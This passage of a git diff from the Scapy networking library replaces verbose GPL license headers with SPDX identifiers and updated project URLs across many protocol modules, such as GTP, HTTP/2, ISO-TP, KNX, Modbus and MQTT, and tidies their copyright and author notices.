the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = EtherIP # scapy.contrib.status = loads diff --git a/scapy/contrib/exposure_notification.py b/scapy/contrib/exposure_notification.py index 17d24a598a2..866ed329e02 100644 --- a/scapy/contrib/exposure_notification.py +++ b/scapy/contrib/exposure_notification.py @@ -1,13 +1,11 @@ -# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*- -# exposure_notification.py - Apple/Google Exposure Notification System -# +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) 2020 Michael Farrell -# This program is published under a GPLv2 (or later) license -# + # scapy.contrib.description = Apple/Google Exposure Notification System (ENS) # scapy.contrib.status = loads + """ Apple/Google Exposure Notification System (ENS), formerly known as Privacy-Preserving Contact Tracing Project. diff --git a/scapy/contrib/geneve.py b/scapy/contrib/geneve.py index 40e77d61070..77ce847a5ed 100644 --- a/scapy/contrib/geneve.py +++ b/scapy/contrib/geneve.py @@ -1,18 +1,7 @@ -# Copyright (C) 2018 Hao Zheng - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2018 Hao Zheng # scapy.contrib.description = Generic Network Virtualization Encapsulation (GENEVE) # scapy.contrib.status = loads diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 87a8664e1c7..faaffba1a95 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -1,10 +1,11 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2018 Leonardo Monteiro # 2017 Alexis Sultan # 2017 Alessio Deiana # 2014 Guillaume Valadon # 2012 ffranz -## -# This program is published under a GPLv2 license # scapy.contrib.description = GPRS Tunneling Protocol (GTP) # scapy.contrib.status = loads diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index bdd0c9d0a7e..b788f3b86b4 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1,20 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2017 Alessio Deiana # 2017 Alexis Sultan -# This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - # scapy.contrib.description = GPRS Tunneling Protocol v2 (GTPv2) # scapy.contrib.status = loads diff --git a/scapy/contrib/gxrp.py b/scapy/contrib/gxrp.py index 65f6e0427dd..73561915fd6 100644 --- a/scapy/contrib/gxrp.py +++ b/scapy/contrib/gxrp.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + # scapy.contrib.description = Generic Attribute Register Protocol (GARP) # scapy.contrib.status = loads @@ -6,17 +10,6 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :author: Sergey Matsievskiy, matsievskiysv@gmail.com - :license: GPLv2 - - This module is free software; you can redistribute it and/or - modify it under the terms of the GNU General Public License - as published by the Free Software Foundation; either version 2 - of the License, or (at your option) any later version. - - This module is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. :description: diff --git a/scapy/contrib/homeplugav.py b/scapy/contrib/homeplugav.py index 99104685328..a6db44447fc 100644 --- a/scapy/contrib/homeplugav.py +++ b/scapy/contrib/homeplugav.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = HomePlugAV Layer # scapy.contrib.status = loads diff --git a/scapy/contrib/homepluggp.py b/scapy/contrib/homepluggp.py index e4d07a20545..484c00f8241 100644 --- a/scapy/contrib/homepluggp.py +++ b/scapy/contrib/homepluggp.py @@ -1,18 +1,6 @@ -#! /usr/bin/env python - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = HomePlugGP Layer # scapy.contrib.status = loads diff --git a/scapy/contrib/homeplugsg.py b/scapy/contrib/homeplugsg.py index 235fd3c7124..65497a2aa08 100644 --- a/scapy/contrib/homeplugsg.py +++ b/scapy/contrib/homeplugsg.py @@ -1,18 +1,6 @@ -#! /usr/bin/env python - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = HomePlugSG Layer # scapy.contrib.status = loads diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index 50dc59815f8..aecdcc9e303 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -1,23 +1,14 @@ -############################################################################# -# # -# http2.py --- HTTP/2 support for Scapy # -# see RFC7540 and RFC7541 # -# for more information # -# # -# Copyright (C) 2016 Florian Maury # -# # -# This file is part of Scapy # -# Scapy is free software: you can redistribute it and/or modify it # -# under the terms of the GNU General Public License version 2 as # -# published by the Free Software Foundation. # -# # -# This program is distributed in the hope that it will be useful, but # -# WITHOUT ANY WARRANTY; without even the implied warranty of # -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # -# General Public License for more details. # -# # -############################################################################# -"""http2 Module +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2016 Florian Maury + +""" +http2 + +HTTP/2 support for Scapy +see RFC7540 and RFC7541 for more information + Implements packets and fields required to encode/decode HTTP/2 Frames and HPack encoded headers """ diff --git a/scapy/contrib/ibeacon.py b/scapy/contrib/ibeacon.py index 1818cecc209..af61cbe3d40 100644 --- a/scapy/contrib/ibeacon.py +++ b/scapy/contrib/ibeacon.py @@ -1,11 +1,8 @@ -# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*- -# ibeacon.py - protocol handlers for iBeacons and other Apple devices -# +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Michael Farrell -# This program is published under a GPLv2 (or later) license -# + # scapy.contrib.description = iBeacon BLE proximity beacon # scapy.contrib.status = loads """ diff --git a/scapy/contrib/icmp_extensions.py b/scapy/contrib/icmp_extensions.py index bae856177ba..3ff05cf0884 100644 --- a/scapy/contrib/icmp_extensions.py +++ b/scapy/contrib/icmp_extensions.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = ICMP Extensions # scapy.contrib.status = loads diff --git a/scapy/contrib/ife.py b/scapy/contrib/ife.py index 3603b61ac37..b71368b885f 100644 --- a/scapy/contrib/ife.py +++ b/scapy/contrib/ife.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information + # scapy.contrib.description = ForCES Inter-FE LFB type (IFE) # scapy.contrib.status = loads @@ -6,17 +10,6 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :author: Alexander Aring, aring@mojatatu.com - :license: GPLv2 - - This module is free software; you can redistribute it and/or - modify it under the terms of the GNU General Public License - as published by the Free Software Foundation; either version 2 - of the License, or (at your option) any later version. - - This module is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. :description: diff --git a/scapy/contrib/igmp.py b/scapy/contrib/igmp.py index 5c11745f61f..21fc061720e 100644 --- a/scapy/contrib/igmp.py +++ b/scapy/contrib/igmp.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Internet Group Management Protocol v1/v2 (IGMP/IGMPv2) # scapy.contrib.status = loads diff --git a/scapy/contrib/igmpv3.py b/scapy/contrib/igmpv3.py index 55e8e966847..9a85841ff12 100644 --- a/scapy/contrib/igmpv3.py +++ b/scapy/contrib/igmpv3.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Internet Group Management Protocol v3 (IGMPv3) # scapy.contrib.status = loads diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 8f54d7fa7b0..3cbca2af77a 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Internet Key Exchange v2 (IKEv2) # scapy.contrib.status = loads diff --git a/scapy/contrib/isis.py b/scapy/contrib/isis.py index 9fcd2bfd535..2d39a98c8c4 100644 --- a/scapy/contrib/isis.py +++ b/scapy/contrib/isis.py @@ -1,16 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2014-2016 BENOCS GmbH, Berlin (Germany) +# Copyright (C) 2020 Metaswitch, London (UK) # scapy.contrib.description = Intermediate System to Intermediate System (ISIS) # scapy.contrib.status = loads @@ -19,24 +11,9 @@ IS-IS Scapy Extension ~~~~~~~~~~~~~~~~~~~~~ - :copyright: 2014-2016 BENOCS GmbH, Berlin (Germany) - :author: Marcel Patzlaff, mpatzlaff@benocs.com - Michal Kaliszan, mkaliszan@benocs.com - - :copyright: 2020 Metaswitch, London (UK) - :author: Tom Zhu, tom.zhu@metaswitch.com - - :license: GPLv2 - - This module is free software; you can redistribute it and/or - modify it under the terms of the GNU General Public License - as published by the Free Software Foundation; either version 2 - of the License, or (at your option) any later version. - - This module is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. + :authors: Marcel Patzlaff, mpatzlaff@benocs.com + Michal Kaliszan, mkaliszan@benocs.com + Tom Zhu, tom.zhu@metaswitch.com :description: diff --git a/scapy/contrib/isotp/__init__.py b/scapy/contrib/isotp/__init__.py index 73f23bbe7ab..7e2ce8e108f 100644 --- a/scapy/contrib/isotp/__init__.py +++ b/scapy/contrib/isotp/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = ISO-TP (ISO 15765-2) # scapy.contrib.status = loads diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index e029560099a..2000d8b7836 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = ISO-TP (ISO 15765-2) Native Socket Library # scapy.contrib.status = library diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py index 7ba1d6812c0..536cf6e42c2 100644 --- a/scapy/contrib/isotp/isotp_packet.py +++ b/scapy/contrib/isotp/isotp_packet.py @@ -1,8 +1,7 @@ - +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = ISO-TP (ISO 15765-2) Packet Definitions # scapy.contrib.status = library diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index fb84eb6d09a..0aaf103842d 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Alexander Schroeder -# This program is published under a GPLv2 license # scapy.contrib.description = ISO-TP (ISO 15765-2) Scanner Utility # scapy.contrib.status = library diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 563f3640656..42b99799500 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Enrico Pozzobon -# This program is published under a GPLv2 license # scapy.contrib.description = ISO-TP (ISO 15765-2) Soft Socket Library # scapy.contrib.status = library diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index f081bd33823..05bddd3fc4c 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -1,9 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Enrico Pozzobon # Copyright (C) Alexander Schroeder -# This program is published under a GPLv2 license # scapy.contrib.description = ISO-TP (ISO 15765-2) Utilities # scapy.contrib.status = library diff --git a/scapy/contrib/knx.py b/scapy/contrib/knx.py index d36c6220d3f..5193db01ecd 100644 --- a/scapy/contrib/knx.py +++ b/scapy/contrib/knx.py @@ -1,31 +1,24 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) 2021 Julien BEDEL # Claire VACHEROT -# This module provides Scapy layers for KNXNet/IP communications over UDP -# according to KNX specifications v2.1 / ISO-IEC 14543-3. -# Specifications can be downloaded for free here : -# https://my.knx.org/en/shop/knx-specifications -# -# Currently, the module (partially) supports the following services : -# * SEARCH REQUEST/RESPONSE -# * DESCRIPTION REQUEST/RESPONSE -# * CONNECT, DISCONNECT, CONNECTION_STATE REQUEST/RESPONSE -# * CONFIGURATION REQUEST/RESPONSE -# * TUNNELING REQUEST/RESPONSE +""" +KNXNet/IP + +This module provides Scapy layers for KNXNet/IP communications over UDP +according to KNX specifications v2.1 / ISO-IEC 14543-3. +Specifications can be downloaded for free here : +https://my.knx.org/en/shop/knx-specifications + +Currently, the module (partially) supports the following services : +* SEARCH REQUEST/RESPONSE +* DESCRIPTION REQUEST/RESPONSE +* CONNECT, DISCONNECT, CONNECTION_STATE REQUEST/RESPONSE +* CONFIGURATION REQUEST/RESPONSE +* TUNNELING REQUEST/RESPONSE +""" # scapy.contrib.description = KNX Protocol # scapy.contrib.status = loads diff --git a/scapy/contrib/lacp.py b/scapy/contrib/lacp.py index b89cbf4144d..d6a7aced8f0 100644 --- a/scapy/contrib/lacp.py +++ b/scapy/contrib/lacp.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Link Aggregation Control Protocol (LACP) # scapy.contrib.status = loads diff --git a/scapy/contrib/ldp.py b/scapy/contrib/ldp.py index dcd5e41b50f..43e3528893b 100644 --- a/scapy/contrib/ldp.py +++ b/scapy/contrib/ldp.py @@ -1,22 +1,17 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2010 Florian Duraffourg + # scapy.contrib.description = Label Distribution Protocol (LDP) # scapy.contrib.status = loads -# http://git.savannah.gnu.org/cgit/ldpscapy.git/snapshot/ldpscapy-5285b81d6e628043df2a83301b292f24a95f0ba1.tar.gz - -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. +""" +Label Distribution Protocol (LDP) -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. +http://git.savannah.gnu.org/cgit/ldpscapy.git/snapshot/ldpscapy-5285b81d6e628043df2a83301b292f24a95f0ba1.tar.gz -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . - -# Copyright (C) 2010 Florian Duraffourg +""" from __future__ import absolute_import import struct diff --git a/scapy/contrib/lldp.py b/scapy/contrib/lldp.py index 38d5442f38d..e1bb8932f79 100644 --- a/scapy/contrib/lldp.py +++ b/scapy/contrib/lldp.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information + # scapy.contrib.description = Link Layer Discovery Protocol (LLDP) # scapy.contrib.status = loads @@ -6,17 +10,6 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :author: Thomas Tannhaeuser, hecke@naberius.de - :license: GPLv2 - - This module is free software; you can redistribute it and/or - modify it under the terms of the GNU General Public License - as published by the Free Software Foundation; either version 2 - of the License, or (at your option) any later version. - - This module is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. :description: diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index a1a75bb659d..08b570f0572 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -1,23 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2020 Sebastien Dudek (@FlUxIuS) # scapy.contrib.description = LoRa PHY to WAN Layer # scapy.contrib.status = loads """ -Copyright (C) 2020 Sebastien Dudek (@FlUxIuS) -initially developed @PentHertz +LoRa PHY to WAN Layer + +Initially developed @PentHertz and improved at @Trend Micro Spec: lorawantm_specification v1.1 diff --git a/scapy/contrib/ltp.py b/scapy/contrib/ltp.py index 5b20a8d1214..1de7ed6a8d8 100755 --- a/scapy/contrib/ltp.py +++ b/scapy/contrib/ltp.py @@ -1,26 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright 2012 (C) The MITRE Corporation """ - Copyright 2012, The MITRE Corporation:: - - NOTICE +.. centered:: + NOTICE This software/technical data was produced for the U.S. Government under Prime Contract No. NASA-03001 and JPL Contract No. 1295026 - and is subject to FAR 52.227-14 (6/87) Rights in Data General, - and Article GP-51, Rights in Data General, respectively. - This software is publicly released under MITRE case #12-3054 + and is subject to FAR 52.227-14 (6/87) Rights in Data General, + and Article GP-51, Rights in Data General, respectively. + This software is publicly released under MITRE case #12-3054 """ # scapy.contrib.description = Licklider Transmission Protocol (LTP) diff --git a/scapy/contrib/mac_control.py b/scapy/contrib/mac_control.py index a213dbeeeb1..af2e2a8f1c3 100644 --- a/scapy/contrib/mac_control.py +++ b/scapy/contrib/mac_control.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information + # scapy.contrib.description = MACControl # scapy.contrib.status = loads @@ -6,17 +10,6 @@ ~~~~~~~~~~ :author: Thomas Tannhaeuser, hecke@naberius.de - :license: GPLv2 - - This module is free software; you can redistribute it and/or - modify it under the terms of the GNU General Public License - as published by the Free Software Foundation; either version 2 - of the License, or (at your option) any later version. - - This module is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. :description: diff --git a/scapy/contrib/macsec.py b/scapy/contrib/macsec.py index 160b79ea543..45b5ed47230 100755 --- a/scapy/contrib/macsec.py +++ b/scapy/contrib/macsec.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Sabrina Dubroca -# This program is published under a GPLv2 license # scapy.contrib.description = 802.1AE - IEEE MAC Security standard (MACsec) # scapy.contrib.status = loads diff --git a/scapy/contrib/modbus.py b/scapy/contrib/modbus.py index 3bf8c3e0908..3b23506e082 100644 --- a/scapy/contrib/modbus.py +++ b/scapy/contrib/modbus.py @@ -1,24 +1,14 @@ -# coding: utf8 - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2017 Arthur Gervais +# Ken LE PRADO, +# Sebastien Mainand +# Thomas Aurel # scapy.contrib.description = ModBus Protocol # scapy.contrib.status = loads -# Copyright (C) 2017 Arthur Gervais, Ken LE PRADO, Sébastien Mainand, -# Thomas Aurel import struct diff --git a/scapy/contrib/mount.py b/scapy/contrib/mount.py index 5ad8ee1001b..9f469e849c0 100644 --- a/scapy/contrib/mount.py +++ b/scapy/contrib/mount.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Lucas Preston -# This program is published under a GPLv2 license # scapy.contrib.description = NFS Mount v3 # scapy.contrib.status = loads diff --git a/scapy/contrib/mpls.py b/scapy/contrib/mpls.py index e5235b4beee..95620c31bf1 100644 --- a/scapy/contrib/mpls.py +++ b/scapy/contrib/mpls.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Multiprotocol Label Switching (MPLS) # scapy.contrib.status = loads diff --git a/scapy/contrib/mqtt.py b/scapy/contrib/mqtt.py index b3af44d8538..d27205d9684 100644 --- a/scapy/contrib/mqtt.py +++ b/scapy/contrib/mqtt.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Santiago Hernandez Ramos -# This program is published under GPLv2 license # scapy.contrib.description = Message Queuing Telemetry Transport (MQTT) # scapy.contrib.status = loads diff --git a/scapy/contrib/mqttsn.py b/scapy/contrib/mqttsn.py index df74805e03f..681465e4afa 100644 --- a/scapy/contrib/mqttsn.py +++ b/scapy/contrib/mqttsn.py @@ -1,10 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) 2019 Freie Universitaet Berlin -# This program is published under GPLv2 license -# -# Specification: -# http://www.mqtt.org/new/wp-content/uploads/2009/06/MQTT-SN_spec_v1.2.pdf + +""" +MQTT for Sensor Networks (MQTT-SN) + +Specification: +http://www.mqtt.org/new/wp-content/uploads/2009/06/MQTT-SN_spec_v1.2.pdf +""" + # scapy.contrib.description = MQTT for 